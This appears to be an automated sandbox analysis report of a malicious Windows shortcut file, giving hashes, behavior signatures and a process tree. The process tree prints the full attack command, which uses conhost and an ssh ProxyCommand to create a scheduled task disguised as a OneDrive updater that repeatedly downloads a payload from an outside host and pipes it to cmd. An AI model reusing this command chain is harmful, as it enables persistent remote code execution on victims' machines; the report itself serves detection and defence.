Analysis
-
max time kernel
94s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
19-09-2024 01:06
General
-
Target
18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6.lnk
-
Size
245KB
-
MD5
0290bfd06ee52af334e6cd17bb03542a
-
SHA1
fb43ac19f177acb3cc7cd74155671733185339b6
-
SHA256
18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6
-
SHA512
e0647f45fbf606fbf0d7dd5737c2c4d6794e7ed6322f05b1803b3f9011fcc33c29519e44715b13da96bc49fed564d79c2f5fe54b56d4f4779ebeb6fdccf6ccd1
-
SSDEEP
6144:XBRWbjpVO9Ko6pGKlt9Z6v+iEpgnXtP2gUly2ukiT:XiPho60Kt9ZylBnXteDlXs
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Delays execution with timeout.exe 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious use of WriteProcessMemory 12 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\18754374691d591315370ed114493b9995954f01bf43452df0af30d69a1670c6.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\system32\conhost.exe"C:\WINDOWS\system32\conhost.exe" --headless ssh -o ProxyCommand="cmd /c ping www.google.com > nul & timeout /t 3 & schtasks /create /tn OneDriveStandaloneUpdateEngine1.0.3 /f /sc minute /mo 17 /tr \"conhost --headless cmd /c curl --ssl-no-revoke -o C:\Users\Public\documents\tmp.jpg https://www.surininfiniumclub.com/debug.php?us=HVDPCYGS_Admin & more C:\Users\Public\documents\tmp.jpg | cmd\" " .2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\OpenSSH\ssh.exessh -o "ProxyCommand=cmd /c ping www.google.com > nul & timeout /t 3 & schtasks /create /tn OneDriveStandaloneUpdateEngine1.0.3 /f /sc minute /mo 17 /tr \"conhost --headless cmd /c curl --ssl-no-revoke -o C:\Users\Public\documents\tmp.jpg https://www.surininfiniumclub.com/debug.php?us=HVDPCYGS_Admin & more C:\Users\Public\documents\tmp.jpg | cmd\" " .3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ping www.google.com > nul & timeout /t 3 & schtasks /create /tn OneDriveStandaloneUpdateEngine1.0.3 /f /sc minute /mo 17 /tr "conhost --headless cmd /c curl --ssl-no-revoke -o C:\Users\Public\documents\tmp.jpg https://www.surininfiniumclub.com/debug.php?us=HVDPCYGS_Admin & more C:\Users\Public\documents\tmp.jpg | cmd"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping www.google.com5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 35⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn OneDriveStandaloneUpdateEngine1.0.3 /f /sc minute /mo 17 /tr "conhost --headless cmd /c curl --ssl-no-revoke -o C:\Users\Public\documents\tmp.jpg https://www.surininfiniumclub.com/debug.php?us=HVDPCYGS_Admin & more C:\Users\Public\documents\tmp.jpg | cmd"5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-